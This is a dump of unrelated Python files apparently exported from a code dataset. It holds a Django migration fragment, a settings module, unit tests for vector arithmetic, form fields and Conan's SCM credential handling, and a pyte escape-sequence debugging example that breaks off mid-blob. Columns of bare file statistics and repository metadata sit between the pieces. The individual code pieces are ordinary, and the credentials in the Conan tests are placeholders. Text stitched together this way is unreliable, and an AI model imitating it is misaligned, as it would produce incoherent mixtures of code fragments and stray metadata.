                ('location', models.CharField(blank=True, max_length=30)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso user',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoUserExperiment',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('favorite', models.BooleanField(default=False)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('calipso_experiment', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoExperiment')),
                ('calipso_user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoUser')),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso user experiment',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoUserQuota',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('max_simultaneous', models.IntegerField(default=5)),
                ('cpu', models.IntegerField(default=5)),
                ('memory', models.CharField(default='30G', max_length=100)),
                ('hdd', models.CharField(default='80G', max_length=100)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('calipso_user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoUser')),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso user quota',
            },
        ),
        # Wire the M2M through the join table created above.
        migrations.AddField(
            model_name='calipsoexperiment',
            name='calipso_users',
            field=models.ManyToManyField(through='apprest.CalipsoUserExperiment', to='apprest.CalipsoUser'),
        ),
        # Each (user, experiment) pair may appear at most once.
        migrations.AlterUniqueTogether(
            name='calipsouserexperiment',
            unique_together={('calipso_user', 'calipso_experiment')},
        ),
    ]
| 56.359413
| 200
| 0.573988
| 2,175
| 23,051
| 5.870805
| 0.101609
| 0.065549
| 0.069074
| 0.092098
| 0.809852
| 0.799906
| 0.757538
| 0.741248
| 0.731772
| 0.694886
| 0
| 0.016738
| 0.276864
| 23,051
| 408
| 201
| 56.497549
| 0.749295
| 0.001952
| 0
| 0.688279
| 1
| 0
| 0.184055
| 0.038211
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.017456
| 0.012469
| 0
| 0.022444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb9ef2c2d84a411e1f0543f7b70267b66af684b1
| 75
|
py
|
Python
|
settings/__init__.py
|
aq1/vkPostman
|
db6b8d387d484ff53d12dcaf77ba3dcaa6da3822
|
[
"MIT"
] | 1
|
2020-09-14T04:47:31.000Z
|
2020-09-14T04:47:31.000Z
|
settings/__init__.py
|
aq1/vkPostman
|
db6b8d387d484ff53d12dcaf77ba3dcaa6da3822
|
[
"MIT"
] | null | null | null |
settings/__init__.py
|
aq1/vkPostman
|
db6b8d387d484ff53d12dcaf77ba3dcaa6da3822
|
[
"MIT"
] | null | null | null |
from settings.settings_base import *
from settings.settings_local import *
| 25
| 37
| 0.84
| 10
| 75
| 6.1
| 0.5
| 0.393443
| 0.655738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 2
| 38
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fba9c833ed676ffa30ded1ec700c726b454cd6a8
| 1,247
|
py
|
Python
|
test/rasmus/test_vector.py
|
Open-Technology/Computational-Biology
|
f7628900f2d1d9ade60d7ad94f6b3d1022c92cb7
|
[
"MIT"
] | 30
|
2015-05-08T19:21:15.000Z
|
2022-03-11T21:30:33.000Z
|
test/rasmus/test_vector.py
|
Open-Technology/Computational-Biology
|
f7628900f2d1d9ade60d7ad94f6b3d1022c92cb7
|
[
"MIT"
] | null | null | null |
test/rasmus/test_vector.py
|
Open-Technology/Computational-Biology
|
f7628900f2d1d9ade60d7ad94f6b3d1022c92cb7
|
[
"MIT"
] | 8
|
2015-05-08T02:02:33.000Z
|
2021-06-10T17:51:03.000Z
|
import unittest
from rasmus import vector as v
class Test (unittest.TestCase):
    """Checks for the element-wise helpers in rasmus.vector."""

    def test_list(self):
        """Element-wise arithmetic and norms on plain lists."""
        a = [1.0, 2.0, 3.0]
        b = [4.0, 5.0, 6.0]
        expectations = [
            (v.vadd, [5.0, 7.0, 9.0]),
            (v.vsub, [-3.0, -3.0, -3.0]),
            (v.vmul, [4.0, 10.0, 18.0]),
            (v.vdiv, [0.25, 0.4, 0.5]),
        ]
        for op, expected in expectations:
            self.assertEqual(op(a, b), expected)
        self.assertAlmostEqual(v.vmag(a), 3.74165738677)
        self.assertAlmostEqual(v.vdist(a, b), 5.19615242271)

    def _test_dict(self):
        """Same checks on dict-keyed vectors.

        NOTE(review): the leading underscore keeps this out of test discovery;
        presumably disabled on purpose — confirm before re-enabling.
        """
        a = {'x': 1.0, 'y': 2.0, 'z': 3.0}
        b = {'x': 4.0, 'y': 5.0, 'z': 6.0}
        expectations = [
            (v.vadd, [5.0, 7.0, 9.0]),
            (v.vsub, [-3.0, -3.0, -3.0]),
            (v.vmul, [4.0, 10.0, 18.0]),
            (v.vdiv, [0.25, 0.4, 0.5]),
        ]
        for op, expected in expectations:
            self.assertEqual(op(a, b), dict(zip('xyz', expected)))
        self.assertAlmostEqual(v.vmag(a), 3.74165738677)
        self.assertAlmostEqual(v.vdist(a, b), 5.19615242271)
| 33.702703
| 62
| 0.44988
| 192
| 1,247
| 2.90625
| 0.223958
| 0.035842
| 0.229391
| 0.243728
| 0.777778
| 0.706093
| 0.706093
| 0.706093
| 0.620072
| 0.620072
| 0
| 0.155748
| 0.351243
| 1,247
| 36
| 63
| 34.638889
| 0.533993
| 0
| 0
| 0.413793
| 0
| 0
| 0.014435
| 0
| 0
| 0
| 0
| 0
| 0.413793
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8399ef8c76c8e673126b50411dbfe092a2663e03
| 2,548
|
py
|
Python
|
livestyled/models/tests/test_form_field.py
|
andrelopez/python-sdk
|
3c83d4698ecf6b5b59003d20cb26644e0dd77f61
|
[
"MIT"
] | null | null | null |
livestyled/models/tests/test_form_field.py
|
andrelopez/python-sdk
|
3c83d4698ecf6b5b59003d20cb26644e0dd77f61
|
[
"MIT"
] | 1
|
2020-05-21T10:01:07.000Z
|
2020-05-21T10:01:07.000Z
|
livestyled/models/tests/test_form_field.py
|
andrelopez/python-sdk
|
3c83d4698ecf6b5b59003d20cb26644e0dd77f61
|
[
"MIT"
] | 3
|
2021-02-01T10:13:36.000Z
|
2022-02-11T17:47:30.000Z
|
from livestyled.models.form_field import FormField
from livestyled.schemas.form_field import FormFieldSchema
def example_form_field_payload():
    """Return a fresh deserialized FormField payload used by both tests below.

    Factored out because the two tests previously duplicated this ~30-line
    literal verbatim; a fresh dict is built per call so tests cannot leak
    mutations into each other.
    """
    return {
        'id': 47,
        'type': 'radio',
        'key': 'radio',
        'validation_regex': 'Test',
        'required': True,
        'select_options': [
            {
                'id': 19,
                'title': 'YES',
                'value': 'YES',
                'icon_url': 'https://cdn3.iconfinder.com/data/icons/flat-actions-icons-9/792/Tick_Mark_Dark-512.png'
            },
            {
                'id': 20,
                'title': 'NO',
                'value': 'NO',
                'icon_url': 'https://lh3.googleusercontent.com/proxy/fN1ayBfVrzPB8xZiqM5k38g6FkdY4EuSR3QuT2EBqwjyH7L8RqEXm4hc34k8E6FAdD5mbmHje0n_hIl6l5saUXH26Ak5b-gWo2iKBPbYTQ9HHlti'
            }
        ],
        'translations': [
            {
                'id': 12,
                'language': 'en',
                'label': 'RadioButton Label',
                'placeholder': 'RadioButton Placeholder 2',
                'validation_error': 'RadioButtonError2'
            }
        ],
        'sort_id': 2,
        'auto_fill': None
    }


def test_create_form_field_from_deserialized():
    """FormField accepts the full deserialized payload as keyword arguments."""
    form_field = FormField(**example_form_field_payload())
    assert form_field


def test_serialize_form_field():
    """A FormField built from deserialized data dumps cleanly through the schema."""
    form_field = FormField(**example_form_field_payload())
    serialized_form_field = FormFieldSchema().dump(form_field)
    assert serialized_form_field
| 32.666667
| 182
| 0.513736
| 202
| 2,548
| 6.272277
| 0.351485
| 0.071034
| 0.037885
| 0.031571
| 0.80663
| 0.80663
| 0.80663
| 0.80663
| 0.80663
| 0.80663
| 0
| 0.055249
| 0.360675
| 2,548
| 77
| 183
| 33.090909
| 0.722529
| 0
| 0
| 0.712329
| 0
| 0.027397
| 0.376766
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 1
| 0.027397
| false
| 0
| 0.027397
| 0
| 0.054795
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83b67496a84ccbe4055b8332e90d5ffc2a326b9a
| 17,120
|
py
|
Python
|
conans/test/unittests/client/tools/scm/test_scm_base.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 6,205
|
2015-12-01T13:40:05.000Z
|
2022-03-31T07:30:25.000Z
|
conans/test/unittests/client/tools/scm/test_scm_base.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 8,747
|
2015-12-01T16:28:48.000Z
|
2022-03-31T23:34:53.000Z
|
conans/test/unittests/client/tools/scm/test_scm_base.py
|
Mattlk13/conan
|
005fc53485557b0a570bb71670f2ca9c66082165
|
[
"MIT"
] | 961
|
2015-12-01T16:56:43.000Z
|
2022-03-31T13:50:52.000Z
|
# coding=utf-8
import unittest
from conans.client.tools.scm import SCMBase
from conans.errors import ConanException
class RemoveCredentialsTest(unittest.TestCase):
    """SCMBase._remove_credentials_url must strip user/password from http(s)
    and svn+ssh URLs while preserving meaningful ssh/scp user parts."""

    def test_http(self):
        clean = 'https://myrepo.com/path/to/repo.git'
        variants = [
            'https://myrepo.com/path/to/repo.git',
            'https://username:password@myrepo.com/path/to/repo.git',
            'https://username@myrepo.com/path/to/repo.git',
            'https://gitlab-ci-token:1324@myrepo.com/path/to/repo.git',
        ]
        for url in variants:
            self.assertEqual(clean, SCMBase._remove_credentials_url(url))

    def test_http_with_port_number(self):
        # The port must survive credential stripping.
        self.assertEqual(
            'https://myrepo.com:8000/path/to/repo.git',
            SCMBase._remove_credentials_url(
                'https://username@myrepo.com:8000/path/to/repo.git'))

    def test_ssh(self):
        # For ssh we don't want to remove the user ('git' in these examples).
        cases = [
            # URL-like syntax: user kept as-is
            ('ssh://git@github.com:2222/conan-io/conan.git',
             'ssh://git@github.com:2222/conan-io/conan.git'),
            # URL-like syntax with a password: password removed, user kept
            ('ssh://git@github.com:2222/conan-io/conan.git',
             'ssh://git:password@github.com:2222/conan-io/conan.git'),
            ('ssh://github.com:2222/conan-io/conan.git',
             'ssh://github.com:2222/conan-io/conan.git'),
            # scp-like syntax: untouched
            ('git@github.com:conan-io/conan.git',
             'git@github.com:conan-io/conan.git'),
        ]
        for expected, url in cases:
            self.assertEqual(expected, SCMBase._remove_credentials_url(url))

    def test_local_unix(self):
        # file:// URLs pass through unchanged, case preserved.
        for url in ('file:///srv/git/project.git', 'file:///srv/git/PROJECT.git'):
            self.assertEqual(url, SCMBase._remove_credentials_url(url))

    def test_local_windows(self):
        # Drive-letter case must be preserved on Windows-style file URLs.
        for url in ('file:///c:/srv/git/PROJECT', 'file:///C:/srv/git/PROJECT'):
            self.assertEqual(url, SCMBase._remove_credentials_url(url))

    def test_svn_ssh(self):
        self.assertEqual(
            'svn+ssh://10.106.191.164/home/svn/shproject',
            SCMBase._remove_credentials_url(
                'svn+ssh://username:password@10.106.191.164/home/svn/shproject'))
class OutputMock(object):
    """Minimal stand-in for an output object: records warnings in ``out``."""

    def __init__(self):
        # Collected messages, in call order.
        self.out = []

    def warn(self, text):
        self.out.append("WARN: %s" % text)
class GetUrlWithCredentialsTest(unittest.TestCase):
    """Behaviour of SCMBase.get_url_with_credentials().

    Covers how the explicit 'username'/'password' attributes combine with (or
    are overridden by) credentials already embedded in the URL, for http(s),
    ssh, scp-like, git and file schemes. Warnings emitted while resolving
    conflicts are captured through OutputMock.

    Fix: test_git_username_password asserted the password warning twice
    (copy-paste duplicate); the second assertion now checks the username
    warning, consistent with test_git_only_username and the ssh/scp analogues.
    """

    def test_url(self):
        scm = SCMBase()
        self.assertEqual('http://github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("http://github.com/conan-io/conan.git"))

    def test_url_username(self):
        scm = SCMBase()
        self.assertEqual('http://user@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("http://user@github.com/conan-io/conan.git"))

    def test_url_password(self):
        scm = SCMBase()
        self.assertEqual('http://user:pass@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials(
                             "http://user:pass@github.com/conan-io/conan.git"))

    def test_url_with_user_param(self):
        scm = SCMBase(username="user")
        self.assertEqual('https://user@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))

    def test_url_with_password_param(self):
        # A password alone (without a username) is not injected into the URL.
        scm = SCMBase(password="pass")
        self.assertEqual('https://github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))

    def test_url_with_user_password_param(self):
        scm = SCMBase(username="user", password="pass")
        self.assertEqual('https://user:pass@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))

    def test_url_with_user_password_characters_param(self):
        # Special/non-ASCII characters must end up percent-encoded.
        scm = SCMBase(username="el niño", password="la contra%seña")
        self.assertEqual('https://el+ni%C3%B1o:la+contra%25se%C3%B1a@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))

    def test_url_user_with_user_param(self):
        output = OutputMock()
        scm = SCMBase(username="user", output=output)
        self.assertEqual('https://dani@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://dani@github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_url_user_with_password_param(self):
        scm = SCMBase(password="pass")
        self.assertEqual('https://dani:pass@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://dani@github.com/conan-io/conan.git"))

    def test_url_user_with_user_password_param(self):
        output = OutputMock()
        scm = SCMBase(username="user", password="pass", output=output)
        self.assertEqual('https://dani:pass@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("https://dani@github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_url_user_pass_with_user_param(self):
        output = OutputMock()
        scm = SCMBase(username="user", output=output)
        self.assertEqual('http://dani:pass@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials(
                             "http://dani:pass@github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_url_user_pass_with_password_param(self):
        output = OutputMock()
        scm = SCMBase(password="pass", output=output)
        self.assertEqual('http://dani:secret@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials(
                             "http://dani:secret@github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM password got from URL, ignoring 'password' parameter", output.out)

    def test_url_user_pass_with_user_password_param(self):
        output = OutputMock()
        scm = SCMBase(username="user", password="pass", output=output)
        self.assertEqual('http://dani:secret@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials(
                             "http://dani:secret@github.com/conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
        self.assertIn("WARN: SCM password got from URL, ignoring 'password' parameter", output.out)

    def test_ssh(self):
        scm = SCMBase()
        self.assertEqual('ssh://github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))

    def test_ssh_username_password(self):
        output = OutputMock()
        scm = SCMBase(username="dani", password="pass", output=output)
        self.assertEqual('ssh://dani@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)

    def test_ssh_username(self):
        scm = SCMBase(username="dani")
        self.assertEqual('ssh://dani@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))

    def test_ssh_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", output=output)
        self.assertEqual('ssh://github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)

    def test_ssh_url_with_username_only_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", output=output)
        self.assertEqual('ssh://dani@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://dani@github.com/conan-io/conan.git"))
        self.assertEqual(1, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)

    def test_ssh_url_with_username_only_username(self):
        output = OutputMock()
        scm = SCMBase(username="dani", output=output)
        self.assertEqual('ssh://git@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://git@github.com/conan-io/conan.git"))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_ssh_url_with_username_and_username_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", username="dani", output=output)
        self.assertEqual('ssh://git@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://git@github.com/conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_ssh_url_with_username_password_and_only_password(self):
        output = OutputMock()
        scm = SCMBase(password="password", output=output)
        self.assertEqual('ssh://git@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://git:pass@github.com/conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
        self.assertIn("WARN: Password in URL cannot be set for 'ssh' SCM type, removing it",
                      output.out)

    def test_ssh_url_with_username_password_and_only_username(self):
        output = OutputMock()
        scm = SCMBase(username="dani", output=output)
        self.assertEqual('ssh://git@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("ssh://git:pass@github.com/conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
        self.assertIn("WARN: Password in URL cannot be set for 'ssh' SCM type, removing it",
                      output.out)

    def test_ssh_url_with_username_password_and_username_password(self):
        output = OutputMock()
        scm = SCMBase(password="password", username="dani", output=output)
        self.assertEqual("ssh://git@github.com/conan-io/conan.git",
                         scm.get_url_with_credentials("ssh://git:pass@github.com/conan-io/conan.git"))
        self.assertEqual(3, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
        self.assertIn("WARN: Password in URL cannot be set for 'ssh' SCM type, removing it",
                      output.out)

    def test_scp(self):
        scm = SCMBase()
        self.assertEqual('git@github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("git@github.com/conan-io/conan.git"))

    def test_scp_only_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", output=output)
        self.assertEqual("git@github.com:conan-io/conan.git",
                         scm.get_url_with_credentials("git@github.com:conan-io/conan.git"))
        self.assertIn("WARN: SCM password cannot be set for scp url, ignoring parameter", output.out)

    def test_scp_only_username(self):
        output = OutputMock()
        scm = SCMBase(username="dani", output=output)
        self.assertEqual('git@github.com:conan-io/conan.git',
                         scm.get_url_with_credentials("git@github.com:conan-io/conan.git"))
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_scp_username_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", username="dani", output=output)
        self.assertEqual("git@github.com:conan-io/conan.git",
                         scm.get_url_with_credentials("git@github.com:conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for scp url, ignoring parameter", output.out)
        self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)

    def test_scp_url_username_password(self):
        output = OutputMock()
        scm = SCMBase(password="password", output=output)
        self.assertEqual('git:pass@github.com:conan-io/conan.git',
                         scm.get_url_with_credentials("git:pass@github.com:conan-io/conan.git"))
        self.assertIn("WARN: URL type not supported, ignoring 'username' and 'password' "
                      "parameters", output.out)

    def test_file_url(self):
        scm = SCMBase()
        self.assertEqual("file://path/to/.git", scm.get_url_with_credentials("file://path/to/.git"))

    def test_file_url_with_username_password_params(self):
        output = OutputMock()
        scm = SCMBase(username="user", password="pass", output=output)
        self.assertEqual('file://path/to/.git', scm.get_url_with_credentials("file://path/to/.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM username cannot be set for file url, ignoring parameter",
                      output.out)
        self.assertIn("WARN: SCM password cannot be set for file url, ignoring parameter",
                      output.out)

    def test_git(self):
        scm = SCMBase()
        self.assertEqual('git://github.com/conan-io/conan.git',
                         scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))

    def test_git_only_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", output=output)
        self.assertEqual("git://github.com/conan-io/conan.git",
                         scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
        self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)

    def test_git_only_username(self):
        output = OutputMock()
        scm = SCMBase(username="dani", output=output)
        self.assertEqual("git://github.com/conan-io/conan.git",
                         scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
        self.assertIn("WARN: SCM username cannot be set for git url, ignoring parameter", output.out)

    def test_git_username_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", username="dani", output=output)
        self.assertEqual("git://github.com/conan-io/conan.git",
                         scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)
        # Was a copy-paste duplicate of the password assertion; the second of the
        # two warnings must concern the username (cf. test_git_only_username).
        self.assertIn("WARN: SCM username cannot be set for git url, ignoring parameter", output.out)

    def test_git_url_username_password(self):
        output = OutputMock()
        scm = SCMBase(password="pass", output=output)
        self.assertEqual("git://github.com/conan-io/conan.git",
                         scm.get_url_with_credentials(
                             "git://user:pass@github.com/conan-io/conan.git"))
        self.assertEqual(2, len(output.out))
        self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)
        self.assertIn("WARN: Username/Password in URL cannot be set for 'git' SCM type, removing it",
                      output.out)
| 52.195122
| 102
| 0.632886
| 2,194
| 17,120
| 4.799909
| 0.056062
| 0.063242
| 0.084322
| 0.105403
| 0.905707
| 0.896781
| 0.878549
| 0.844364
| 0.829741
| 0.799449
| 0
| 0.006174
| 0.233703
| 17,120
| 327
| 103
| 52.35474
| 0.796555
| 0.008645
| 0
| 0.592593
| 0
| 0.011111
| 0.347106
| 0.125074
| 0
| 0
| 0
| 0
| 0.348148
| 1
| 0.159259
| false
| 0.292593
| 0.011111
| 0
| 0.181481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
83bf87709775b9491340477ec7f030ca39d9e5b7
| 4,983
|
py
|
Python
|
windows/win32/pyte-0.4.8/examples/debug.py
|
mytliulei/DCNRobotInstallPackages
|
224a7d3dec715c8990bd35b7a390b387afd03bc4
|
[
"Apache-2.0"
] | null | null | null |
windows/win32/pyte-0.4.8/examples/debug.py
|
mytliulei/DCNRobotInstallPackages
|
224a7d3dec715c8990bd35b7a390b387afd03bc4
|
[
"Apache-2.0"
] | null | null | null |
windows/win32/pyte-0.4.8/examples/debug.py
|
mytliulei/DCNRobotInstallPackages
|
224a7d3dec715c8990bd35b7a390b387afd03bc4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
debug
~~~~~
... what if I need to debug a bunch of escape sequences? Just use
:class:`~pyte.streams.DebugStream` instead of the usual
:class:`~pyte.streams.Stream`. Note though, that it requires
:func:`bytes` as input.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
from __future__ import print_function, unicode_literals
import sys
sys.path.append("..")
import pyte
# A blob of `ADOM` output we need to debug. Hey! I know this is ugly ...
blob = b"""\x1b[25d\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[23;15H\x1b[37m\x1b[40mSt:28 Le: 1 Wi: 8 Dx:12 To:31 Ch: 3 Ap: 5 Ma: 9 Pe:11 C\x08\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[5d\x08\x08\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[5;75H\x1b[33m\x1b[40m.\x1b[6d\x08\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[7;73H^\x1b[8d\x1b[0;10m\x1b[33m\x1b[40m.\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;75H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[5;72H\x1b[0;10;1m\x1b[37m\x1b[40m^\x1b[6d\x08^\x1b[30m\x1b[40m^@\x1b[0;10m\x1b[33m\x1b[40m.\x1b[7;72H\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[8d\x1b[0;10m\x1b[33m\x1b[40m..\x1b[0;10;1m\x1b[37m\x1b[40m^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mYou\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mneed\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mspecial\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mequipment\x1b[0;10m\x1b[39;49m\x1b[37m\x